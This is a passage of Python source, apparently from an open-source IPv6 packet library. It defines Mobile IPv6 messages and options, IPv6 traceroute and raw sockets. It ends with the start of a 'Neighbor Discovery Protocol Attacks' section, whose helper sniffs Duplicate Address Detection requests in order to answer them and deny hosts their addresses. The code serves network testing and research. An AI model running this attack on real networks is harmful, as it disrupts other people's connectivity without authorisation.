   2555             cls = ICMPv6NIReplyUnknown
   2556     return cls
   2559 #############################################################################
   2560 #############################################################################
   2561 ###             Mobile IPv6 (RFC 3775) and Nemo (RFC 3963)                ###
   2562 #############################################################################
   2563 #############################################################################
   2565 # Mobile IPv6 ICMPv6 related classes
   2567 class ICMPv6HAADRequest(_ICMPv6):
   2568     name = 'ICMPv6 Home Agent Address Discovery Request'
   2569     fields_desc = [ ByteEnumField("type", 144, icmp6types),
   2570                     ByteField("code", 0),
   2571                     XShortField("cksum", None),
   2572                     XShortField("id", None),
   2573                     BitEnumField("R", 1, 1, {1: 'MR'}),
   2574                     XBitField("res", 0, 15) ]
   2575     def hashret(self):
   2576         return struct.pack("!H",self.id)+self.payload.hashret()
   2578 class ICMPv6HAADReply(_ICMPv6):
   2579     name = 'ICMPv6 Home Agent Address Discovery Reply'
   2580     fields_desc = [ ByteEnumField("type", 145, icmp6types),
   2581                     ByteField("code", 0),
   2582                     XShortField("cksum", None),
   2583                     XShortField("id", None),
   2584                     BitEnumField("R", 1, 1, {1: 'MR'}),
   2585                     XBitField("res", 0, 15),
   2586                     IP6ListField('addresses', None) ]
   2587     def hashret(self):
   2588         return struct.pack("!H",self.id)+self.payload.hashret()
   2590     def answers(self, other):
   2591         if not isinstance(other, ICMPv6HAADRequest):
   2592             return 0
   2593         return self.id == other.id
   2595 class ICMPv6MPSol(_ICMPv6):
   2596     name = 'ICMPv6 Mobile Prefix Solicitation'
   2597     fields_desc = [ ByteEnumField("type", 146, icmp6types),
   2598                     ByteField("code", 0),
   2599                     XShortField("cksum", None),
   2600                     XShortField("id", None),
   2601                     XShortField("res", 0) ]
   2602     def _hashret(self):
   2603         return struct.pack("!H",self.id)
   2605 class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
   2606     name = 'ICMPv6 Mobile Prefix Advertisement'
   2607     fields_desc = [ ByteEnumField("type", 147, icmp6types),
   2608                     ByteField("code", 0),
   2609                     XShortField("cksum", None),
   2610                     XShortField("id", None),
   2611                     BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
   2612                     XBitField("res", 0, 14) ]
   2613     def hashret(self):
   2614         return struct.pack("!H",self.id)
   2616     def answers(self, other):
   2617         return isinstance(other, ICMPv6MPSol)
   2619 # Mobile IPv6 Options classes
   2622 _mobopttypes = { 2: "Binding Refresh Advice",
   2623                  3: "Alternate Care-of Address",
   2624                  4: "Nonce Indices",
   2625                  5: "Binding Authorization Data",
   2626                  6: "Mobile Network Prefix (RFC3963)",
   2627                  7: "Link-Layer Address (RFC4068)",
   2628                  8: "Mobile Node Identifier (RFC4283)",
   2629                  9: "Mobility Message Authentication (RFC4285)",
   2630                  10: "Replay Protection (RFC4285)",
   2631                  11: "CGA Parameters Request (RFC4866)",
   2632                  12: "CGA Parameters (RFC4866)",
   2633                  13: "Signature (RFC4866)",
   2634                  14: "Home Keygen Token (RFC4866)",
   2635                  15: "Care-of Test Init (RFC4866)",
   2636                  16: "Care-of Test (RFC4866)" }
   2639 class _MIP6OptAlign:
   2640     """ Mobile IPv6 options have alignment requirements of the form x*n+y.
   2641     This class is inherited by all MIPv6 options to help in computing the
   2642     required Padding for that option, i.e. the need for a Pad1 or PadN
   2643     option before it. They only need to provide x and y as class
   2644     parameters. (x=0 and y=0 are used when no alignment is required)"""
   2645     def alignment_delta(self, curpos):
   2646       x = self.x ; y = self.y
   2647       if x == 0 and y ==0:
   2648           return 0
   2649       delta = x*((curpos - y + x - 1)//x) + y - curpos
   2650       return delta
   2653 class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
   2654     name = 'Mobile IPv6 Option - Binding Refresh Advice'
   2655     fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
   2656                     ByteField('olen', 2),
   2657                     ShortField('rinter', 0) ]
   2658     x = 2 ; y = 0# alignment requirement: 2n
   2660 class MIP6OptAltCoA(_MIP6OptAlign, Packet):
   2661     name = 'MIPv6 Option - Alternate Care-of Address'
   2662     fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
   2663                     ByteField('olen', 16),
   2664                     IP6Field("acoa", "::") ]
   2665     x = 8 ; y = 6 # alignment requirement: 8n+6
   2667 class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
   2668     name = 'MIPv6 Option - Nonce Indices'
   2669     fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
   2670                     ByteField('olen', 16),
   2671                     ShortField('hni', 0),
   2672                     ShortField('coni', 0) ]
   2673     x = 2 ; y = 0 # alignment requirement: 2n
   2675 class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
   2676     name = 'MIPv6 Option - Binding Authorization Data'
   2677     fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
   2678                     ByteField('olen', 16),
   2679                     BitField('authenticator', 0, 96) ]
   2680     x = 8 ; y = 2 # alignment requirement: 8n+2
   2682 class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
   2683     name = 'NEMO Option - Mobile Network Prefix'
   2684     fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
   2685                     ByteField("olen", 18),
   2686                     ByteField("reserved", 0),
   2687                     ByteField("plen", 64),
   2688                     IP6Field("prefix", "::") ]
   2689     x = 8 ; y = 4 # alignment requirement: 8n+4
   2691 class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
   2692     name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
   2693     fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
   2694                     ByteField("olen", 7),
   2695                     ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
   2696                     ByteField("pad", 0),
   2697                     MACField("lla", ETHER_ANY) ] # Only support ethernet
   2698     x = 0 ; y = 0 # alignment requirement: none
   2700 class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
   2701     name = "MIPv6 Option - Mobile Node Identifier"
   2702     fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
   2703                     FieldLenField("olen", None, length_of="id", fmt="B",
   2704                                   adjust = lambda pkt,x: x+1),
   2705                     ByteEnumField("subtype", 1, {1: "NAI"}),
   2706                     StrLenField("id", "",
   2707                                 length_from = lambda pkt: pkt.olen-1) ]
   2708     x = 0 ; y = 0 # alignment requirement: none
   2710 # We only support decoding and basic build. Automatic HMAC computation is
   2711 # too much work for our current needs. It is left to the user (I mean ...
   2712 # you). --arno
   2713 class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
   2714     name = "MIPv6 Option - Mobility Message Authentication"
   2715     fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
   2716                     FieldLenField("olen", None, length_of="authdata", fmt="B",
   2717                                   adjust = lambda pkt,x: x+5),
   2718                     ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
   2719                                                  2: "MN-AAA authentication mobility option"}),
   2720                     IntField("mspi", None),
   2721                     StrLenField("authdata", "A"*12,
   2722                                 length_from = lambda pkt: pkt.olen-5) ]
   2723     x = 4 ; y = 1 # alignment requirement: 4n+1
   2725 # Extracted from RFC 1305 (NTP) :
   2726 # NTP timestamps are represented as a 64-bit unsigned fixed-point number,
   2727 # in seconds relative to 0h on 1 January 1900. The integer part is in the
   2728 # first 32 bits and the fraction part in the last 32 bits.
   2729 class NTPTimestampField(LongField):
   2730     def i2repr(self, pkt, x):
   2731         if x < ((50*31536000)<<32):
   2732             return "Some date a few decades ago (%d)" % x
   2734         # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
   2735         # January 1st 1970 :
   2736         delta = -2209075761
   2737         i = int(x >> 32)
   2738         j = float(x & 0xffffffff) * 2.0**-32
   2739         res = i + j + delta
   2740         t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
   2742         return "%s (%d)" % (t, x)
   2744 class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
   2745     name = "MIPv6 option - Replay Protection"
   2746     fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
   2747                     ByteField("olen", 8),
   2748                     NTPTimestampField("timestamp", 0) ]
   2749     x = 8 ; y = 2 # alignment requirement: 8n+2
   2751 class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
   2752     name = "MIPv6 option - CGA Parameters Request"
   2753     fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
   2754                     ByteField("olen", 0) ]
   2755     x = 0 ; y = 0 # alignment requirement: none
   2757 # XXX TODO: deal with CGA param fragmentation and build of defragmented
   2758 # XXX       version. Passing of a big CGAParam structure should be
   2759 # XXX       simplified. Make it hold packets, by the way  --arno
   2760 class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
   2761     name = "MIPv6 option - CGA Parameters"
   2762     fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
   2763                     FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
   2764                     StrLenField("cgaparams", "",
   2765                                 length_from = lambda pkt: pkt.olen) ]
   2766     x = 0 ; y = 0 # alignment requirement: none
   2768 class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
   2769     name = "MIPv6 option - Signature"
   2770     fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
   2771                     FieldLenField("olen", None, length_of="sig", fmt="B"),
   2772                     StrLenField("sig", "",
   2773                                 length_from = lambda pkt: pkt.olen) ]
   2774     x = 0 ; y = 0 # alignment requirement: none
   2776 class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
   2777     name = "MIPv6 option - Home Keygen Token"
   2778     fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
   2779                     FieldLenField("olen", None, length_of="hkt", fmt="B"),
   2780                     StrLenField("hkt", "",
   2781                                 length_from = lambda pkt: pkt.olen) ]
   2782     x = 0 ; y = 0 # alignment requirement: none
   2784 class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
   2785     name = "MIPv6 option - Care-of Test Init"
   2786     fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
   2787                     ByteField("olen", 0) ]
   2788     x = 0 ; y = 0 # alignment requirement: none
   2790 class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
   2791     name = "MIPv6 option - Care-of Test"
   2792     fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
   2793                     FieldLenField("olen", None, length_of="cokt", fmt="B"),
   2794                     StrLenField("cokt", b'\x00'*8,
   2795                                 length_from = lambda pkt: pkt.olen) ]
   2796     x = 0 ; y = 0 # alignment requirement: none
   2798 class MIP6OptUnknown(_MIP6OptAlign, Packet):
   2799     name = 'Scapy6 - Unknown Mobility Option'
   2800     fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
   2801                     FieldLenField("olen", None, length_of="odata", fmt="B"),
   2802                     StrLenField("odata", "",
   2803                                 length_from = lambda pkt: pkt.olen) ]
   2804     x = 0 ; y = 0 # alignment requirement: none
   2806 moboptcls = {  0: Pad1,
   2807                1: PadN,
   2808                2: MIP6OptBRAdvice,
   2809                3: MIP6OptAltCoA,
   2810                4: MIP6OptNonceIndices,
   2811                5: MIP6OptBindingAuthData,
   2812                6: MIP6OptMobNetPrefix,
   2813                7: MIP6OptLLAddr,
   2814                8: MIP6OptMNID,
   2815                9: MIP6OptMsgAuth,
   2816               10: MIP6OptReplayProtection,
   2817               11: MIP6OptCGAParamsReq,
   2818               12: MIP6OptCGAParams,
   2819               13: MIP6OptSignature,
   2820               14: MIP6OptHomeKeygenToken,
   2821               15: MIP6OptCareOfTestInit,
   2822               16: MIP6OptCareOfTest }
   2825 # Main Mobile IPv6 Classes
   2827 mhtypes = {  0: 'BRR',
   2828              1: 'HoTI',
   2829              2: 'CoTI',
   2830              3: 'HoT',
   2831              4: 'CoT',
   2832              5: 'BU',
   2833              6: 'BA',
   2834              7: 'BE',
   2835              8: 'Fast BU',
   2836              9: 'Fast BA',
   2837             10: 'Fast NA' }
   2839 # From http://www.iana.org/assignments/mobility-parameters
   2840 bastatus = {   0: 'Binding Update accepted',
   2841                1: 'Accepted but prefix discovery necessary',
   2842              128: 'Reason unspecified',
   2843              129: 'Administratively prohibited',
   2844              130: 'Insufficient resources',
   2845              131: 'Home registration not supported',
   2846              132: 'Not home subnet',
   2847              133: 'Not home agent for this mobile node',
   2848              134: 'Duplicate Address Detection failed',
   2849              135: 'Sequence number out of window',
   2850              136: 'Expired home nonce index',
   2851              137: 'Expired care-of nonce index',
   2852              138: 'Expired nonces',
   2853              139: 'Registration type change disallowed',
   2854              140: 'Mobile Router Operation not permitted',
   2855              141: 'Invalid Prefix',
   2856              142: 'Not Authorized for Prefix',
   2857              143: 'Forwarding Setup failed (prefixes missing)',
   2858              144: 'MIPV6-ID-MISMATCH',
   2859              145: 'MIPV6-MESG-ID-REQD',
   2860              146: 'MIPV6-AUTH-FAIL',
   2861              147: 'Permanent home keygen token unavailable',
   2862              148: 'CGA and signature verification failed',
   2863              149: 'Permanent home keygen token exists',
   2864              150: 'Non-null home nonce index expected' }
   2867 class _MobilityHeader(Packet):
   2868     name = 'Dummy IPv6 Mobility Header'
   2869     overload_fields = { IPv6: { "nh": 135 }}
   2871     def post_build(self, p, pay):
   2872         p += pay
   2873         l = self.len
   2874         if self.len is None:
   2875             l = (len(p)-8)//8
   2876         p = chb(p[0]) + struct.pack("B", l) + chb(p[2:])
   2877         if self.cksum is None:
   2878             cksum = in6_chksum(135, self.underlayer, p)
   2879         else:
   2880             cksum = self.cksum
   2881         p = chb(p[:4])+struct.pack("!H", cksum)+chb(p[6:])
   2882         return p
   2885 class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
   2886     name = "IPv6 Mobility Header - Generic Message"
   2887     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   2888                     ByteField("len", None),
   2889                     ByteEnumField("mhtype", None, mhtypes),
   2890                     ByteField("res", None),
   2891                     XShortField("cksum", None),
   2892                     StrLenField("msg", b"\x00"*2,
   2893                                 length_from = lambda pkt: 8*pkt.len-6) ]
   2897 # TODO: make a generic _OptionsField
   2898 class _MobilityOptionsField(PacketListField):
   2899     __slots__ = ["curpos"]
   2900     def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
   2901         self.curpos = curpos
   2902         PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
   2904     def getfield(self, pkt, s):
   2905         l = self.length_from(pkt)
   2906         return s[l:],self.m2i(pkt, s[:l])
   2908     def i2len(self, pkt, i):
   2909         return len(self.i2m(pkt, i))
   2911     def m2i(self, pkt, x):
   2912         opt = []
   2913         while x:
   2914             o = orb(x[0]) # Option type
   2915             cls = self.cls
   2916             if o in moboptcls:
   2917                 cls = moboptcls[o]
   2918             try:
   2919                 op = cls(x)
   2920             except:
   2921                 op = self.cls(x)
   2922             opt.append(op)
   2923             if isinstance(op.payload, conf.raw_layer):
   2924                 x = op.payload.load
   2925                 del(op.payload)
   2926             else:
   2927                 x = b""
   2928         return opt
   2930     def i2m(self, pkt, x):
   2931         autopad = None
   2932         try:
   2933             autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
   2934         except:
   2935             autopad = 1
   2937         if not autopad:
   2938             return b"".join(map(str, x))
   2940         curpos = self.curpos
   2941         s = b""
   2942         for p in x:
   2943             d = p.alignment_delta(curpos)
   2944             curpos += d
   2945             if d == 1:
   2946                 s += raw(Pad1())
   2947             elif d != 0:
   2948                 s += raw(PadN(optdata=b'\x00'*(d-2)))
   2949             pstr = raw(p)
   2950             curpos += len(pstr)
   2951             s += pstr
   2953         # Let's make the class including our option field
   2954         # a multiple of 8 octets long
   2955         d = curpos % 8
   2956         if d == 0:
   2957             return s
   2958         d = 8 - d
   2959         if d == 1:
   2960             s += raw(Pad1())
   2961         elif d != 0:
   2962             s += raw(PadN(optdata=b'\x00'*(d-2)))
   2964         return s
   2966     def addfield(self, pkt, s, val):
   2967         return s+self.i2m(pkt, val)
   2969 class MIP6MH_BRR(_MobilityHeader):
   2970     name = "IPv6 Mobility Header - Binding Refresh Request"
   2971     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   2972                     ByteField("len", None),
   2973                     ByteEnumField("mhtype", 0, mhtypes),
   2974                     ByteField("res", None),
   2975                     XShortField("cksum", None),
   2976                     ShortField("res2", None),
   2977                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
   2978                     _MobilityOptionsField("options", [], MIP6OptUnknown, 8,
   2979                                           length_from = lambda pkt: 8*pkt.len) ]
   2980     overload_fields = { IPv6: { "nh": 135 } }
   2981     def hashret(self):
   2982         # Hack: BRR, BU and BA have the same hashret that returns the same
   2983         #       value b"\x00\x08\x09" (concatenation of mhtypes). This is
   2984         #       because we need match BA with BU and BU with BRR. --arno
   2985         return b"\x00\x08\x09"
   2987 class MIP6MH_HoTI(_MobilityHeader):
   2988     name = "IPv6 Mobility Header - Home Test Init"
   2989     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   2990                     ByteField("len", None),
   2991                     ByteEnumField("mhtype", 1, mhtypes),
   2992                     ByteField("res", None),
   2993                     XShortField("cksum", None),
   2994                     StrFixedLenField("reserved", b"\x00"*2, 2),
   2995                     StrFixedLenField("cookie", b"\x00"*8, 8),
   2996                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
   2997                     _MobilityOptionsField("options", [], MIP6OptUnknown, 16,
   2998                                           length_from = lambda pkt: 8*(pkt.len-1)) ]
   2999     overload_fields = { IPv6: { "nh": 135 } }
   3000     def hashret(self):
   3001         return raw(self.cookie)
   3003 class MIP6MH_CoTI(MIP6MH_HoTI):
   3004     name = "IPv6 Mobility Header - Care-of Test Init"
   3005     mhtype = 2
   3006     def hashret(self):
   3007         return raw(self.cookie)
   3009 class MIP6MH_HoT(_MobilityHeader):
   3010     name = "IPv6 Mobility Header - Home Test"
   3011     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   3012                     ByteField("len", None),
   3013                     ByteEnumField("mhtype", 3, mhtypes),
   3014                     ByteField("res", None),
   3015                     XShortField("cksum", None),
   3016                     ShortField("index", None),
   3017                     StrFixedLenField("cookie", b"\x00"*8, 8),
   3018                     StrFixedLenField("token", b"\x00"*8, 8),
   3019                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
   3020                     _MobilityOptionsField("options", [], MIP6OptUnknown, 24,
   3021                                           length_from = lambda pkt: 8*(pkt.len-2)) ]
   3022     overload_fields = { IPv6: { "nh": 135 } }
   3023     def hashret(self):
   3024         return raw(self.cookie)
   3025     def answers(self, other):
   3026         if (isinstance(other, MIP6MH_HoTI) and
   3027             self.cookie == other.cookie):
   3028             return 1
   3029         return 0
   3031 class MIP6MH_CoT(MIP6MH_HoT):
   3032     name = "IPv6 Mobility Header - Care-of Test"
   3033     mhtype = 4
   3034     def hashret(self):
   3035         return raw(self.cookie)
   3037     def answers(self, other):
   3038         if (isinstance(other, MIP6MH_CoTI) and
   3039             self.cookie == other.cookie):
   3040             return 1
   3041         return 0
   3043 class LifetimeField(ShortField):
   3044     def i2repr(self, pkt, x):
   3045         return "%d sec" % (4*x)
   3047 class MIP6MH_BU(_MobilityHeader):
   3048     name = "IPv6 Mobility Header - Binding Update"
   3049     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   3050                     ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
   3051                     ByteEnumField("mhtype", 5, mhtypes),
   3052                     ByteField("res", None),
   3053                     XShortField("cksum", None),
   3054                     XShortField("seq", None), # TODO: ShortNonceField
   3055                     FlagsField("flags", "KHA", 7, "PRMKLHA"),
   3056                     XBitField("reserved", 0, 9),
   3057                     LifetimeField("mhtime", 3), # unit == 4 seconds
   3058                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
   3059                     _MobilityOptionsField("options", [], MIP6OptUnknown, 12,
   3060                                           length_from = lambda pkt: 8*pkt.len - 4) ]
   3061     overload_fields = { IPv6: { "nh": 135 } }
   3063     def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
   3064         return b"\x00\x08\x09"
   3066     def answers(self, other):
   3067         if isinstance(other, MIP6MH_BRR):
   3068             return 1
   3069         return 0
   3071 class MIP6MH_BA(_MobilityHeader):
   3072     name = "IPv6 Mobility Header - Binding ACK"
   3073     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   3074                     ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
   3075                     ByteEnumField("mhtype", 6, mhtypes),
   3076                     ByteField("res", None),
   3077                     XShortField("cksum", None),
   3078                     ByteEnumField("status", 0, bastatus),
   3079                     FlagsField("flags", "K", 3, "PRK"),
   3080                     XBitField("res2", None, 5),
   3081                     XShortField("seq", None), # TODO: ShortNonceField
   3082                     XShortField("mhtime", 0), # unit == 4 seconds
   3083                     _PhantomAutoPadField("autopad", 1), # autopad activated by default
   3084                     _MobilityOptionsField("options", [], MIP6OptUnknown, 12,
   3085                                           length_from = lambda pkt: 8*pkt.len-4) ]
   3086     overload_fields = { IPv6: { "nh": 135 }}
   3088     def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
   3089         return b"\x00\x08\x09"
   3091     def answers(self, other):
   3092         if (isinstance(other, MIP6MH_BU) and
   3093             other.mhtype == 5 and
   3094             self.mhtype == 6 and
   3095             other.flags & 0x1 and # Ack request flags is set
   3096             self.seq == other.seq):
   3097             return 1
   3098         return 0
   3100 _bestatus = { 1: 'Unknown binding for Home Address destination option',
   3101               2: 'Unrecognized MH Type value' }
   3103 # TODO: match Binding Error to its stimulus
   3104 class MIP6MH_BE(_MobilityHeader):
   3105     name = "IPv6 Mobility Header - Binding Error"
   3106     fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
   3107                     ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
   3108                     ByteEnumField("mhtype", 7, mhtypes),
   3109                     ByteField("res", 0),
   3110                     XShortField("cksum", None),
   3111                     ByteEnumField("status", 0, _bestatus),
   3112                     ByteField("reserved", 0),
   3113                     IP6Field("ha", "::"),
   3114                     _MobilityOptionsField("options", [], MIP6OptUnknown, 24,
   3115                                           length_from = lambda pkt: 8*(pkt.len-2)) ]
   3116     overload_fields = { IPv6: { "nh": 135 }}
   3118 _mip6_mhtype2cls = { 0: MIP6MH_BRR,
   3119                      1: MIP6MH_HoTI,
   3120                      2: MIP6MH_CoTI,
   3121                      3: MIP6MH_HoT,
   3122                      4: MIP6MH_CoT,
   3123                      5: MIP6MH_BU,
   3124                      6: MIP6MH_BA,
   3125                      7: MIP6MH_BE }
   3129 #############################################################################
   3130 #############################################################################
   3131 ###                             Traceroute6                               ###
   3132 #############################################################################
   3133 #############################################################################
   3135 class  AS_resolver6(AS_resolver_riswhois):
   3136     def _resolve_one(self, ip):
   3137         """
   3138         overloaded version to provide a Whois resolution on the
   3139         embedded IPv4 address if the address is 6to4 or Teredo.
   3140         Otherwise, the native IPv6 address is passed.
   3141         """
   3143         if in6_isaddr6to4(ip): # for 6to4, use embedded @
   3144             tmp = inet_pton(socket.AF_INET6, ip)
   3145             addr = inet_ntop(socket.AF_INET, tmp[2:6])
   3146         elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
   3147             addr = teredoAddrExtractInfo(ip)[2]
   3148         else:
   3149             addr = ip
   3151         _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
   3153         if asn.startswith("AS"):
   3154             try:
   3155                 asn = int(asn[2:])
   3156             except ValueError:
   3157                 pass
   3159         return ip,asn,desc        
   3161 class TracerouteResult6(TracerouteResult):
   3162     __slots__ = []
   3163     def show(self):
   3164         return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
   3165                                             s_r[0].hlim,
   3166                                             s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
   3167                                                            "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
   3168                                                            "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
   3169                                                            "{ICMPv6EchoReply:%ir,type%}")))
   3171     def get_trace(self):
   3172         trace = {}
   3174         for s,r in self.res:
   3175             if IPv6 not in s:
   3176                 continue
   3177             d = s[IPv6].dst
   3178             if d not in trace:
   3179                 trace[d] = {}
   3181             t = not (ICMPv6TimeExceeded in r or
   3182                      ICMPv6DestUnreach in r or
   3183                      ICMPv6PacketTooBig in r or
   3184                      ICMPv6ParamProblem in r)
   3186             trace[d][s[IPv6].hlim] = r[IPv6].src, t
   3188         for k in six.itervalues(trace):
   3189             try:
   3190                 m = min(x for x, y in six.itervalues(k) if y)
   3191             except ValueError:
   3192                 continue
   3193             for l in list(k):  # use list(): k is modified in the loop
   3194                 if l > m:
   3195                     del k[l]
   3197         return trace
   3199     def graph(self, ASres=AS_resolver6(), **kargs):
   3200         TracerouteResult.graph(self, ASres=ASres, **kargs)
   3202 @conf.commands.register
   3203 def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 
   3204                 l4 = None, timeout=2, verbose=None, **kargs):
   3205     """Instant TCP traceroute using IPv6
   3206     traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
   3207     """
   3208     if verbose is None:
   3209         verbose = conf.verb
   3211     if l4 is None:
   3212         a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
   3213                  timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
   3214     else:
   3215         a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
   3216                  timeout=timeout, verbose=verbose, **kargs)
   3218     a = TracerouteResult6(a.res)
   3220     if verbose:
   3221         a.display()
   3223     return a,b
   3225 #############################################################################
   3226 #############################################################################
   3227 ###                                Sockets                                ###
   3228 #############################################################################
   3229 #############################################################################
   3231 class L3RawSocket6(L3RawSocket):
   3232     def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
   3233         L3RawSocket.__init__(self, type, filter, iface, promisc)
   3234         # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
   3235         self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
   3236         self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
   3238 def IPv6inIP(dst='', src=None):
   3239   _IPv6inIP.dst = dst
   3240   _IPv6inIP.src = src
   3241   if not conf.L3socket == _IPv6inIP:
   3242     _IPv6inIP.cls = conf.L3socket
   3243   else:
   3244     del(conf.L3socket)
   3245   return _IPv6inIP
   3247 class _IPv6inIP(SuperSocket):
   3248   dst = ''
   3249   src = None
   3250   cls = None
   3252   def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
   3253     SuperSocket.__init__(self, family, type, proto)
   3254     self.worker = self.cls(**args)
   3256   def set(self, dst, src=None):
   3257     _IPv6inIP.src = src
   3258     _IPv6inIP.dst = dst
   3260   def nonblock_recv(self):
   3261     p = self.worker.nonblock_recv()
   3262     return self._recv(p)
   3264   def recv(self, x):
   3265     p = self.worker.recv(x)
   3266     return self._recv(p, x)
   3268   def _recv(self, p, x=MTU):
   3269     if p is None:
   3270       return p
   3271     elif isinstance(p, IP):
   3272       # TODO: verify checksum
   3273       if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
   3274         if isinstance(p.payload, IPv6):
   3275           return p.payload
   3276     return p
   3278   def send(self, x):
   3279     return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
   3282 #############################################################################
   3283 #############################################################################
   3284 ###                  Neighbor Discovery Protocol Attacks                  ###
   3285 #############################################################################
   3286 #############################################################################
   3288 def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
   3289                         tgt_filter=None, reply_mac=None):
   3290     """
   3291     Internal generic helper accepting a specific callback as first argument,
   3292     for NS or NA reply. See the two specific functions below.
   3293     """
   3295     def is_request(req, mac_src_filter, tgt_filter):
   3296         """
   3297         Check if packet req is a request
   3298         """
   3300         # Those simple checks are based on Section 5.4.2 of RFC 4862
   3301         if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
   3302             return 0
   3304         # Get and compare the MAC address
   3305         mac_src = req[Ether].src
   3306         if mac_src_filter and mac_src != mac_src_filter:
   3307             return 0
   3309         # Source must be the unspecified address
   3310         if req[IPv6].src != "::":
   3311             return 0
   3313         # Check destination is the link-local solicited-node multicast
   3314         # address associated with target address in received NS
   3315         tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
   3316         if tgt_filter and tgt != tgt_filter:
   3317             return 0
   3318         received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
   3319         expected_snma = in6_getnsma(tgt)
   3320         if received_snma != expected_snma:
   3321             return 0
   3323         return 1
   3325     if not iface:
   3326         iface = conf.iface
   3328     # To prevent sniffing our own traffic
   3329     if not reply_mac:
   3330         reply_mac = get_if_hwaddr(iface)
   3331     sniff_filter = "icmp6 and not ether src %s" % reply_mac
   3333     sniff(store=0,
   3334           filter=sniff_filter,
   3335           lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
   3336           prn=lambda x: reply_callback(x, reply_mac, iface),
   3337           iface=iface)
   3340 def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
   3341                               reply_mac=None):
   3342     """
   3343     Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
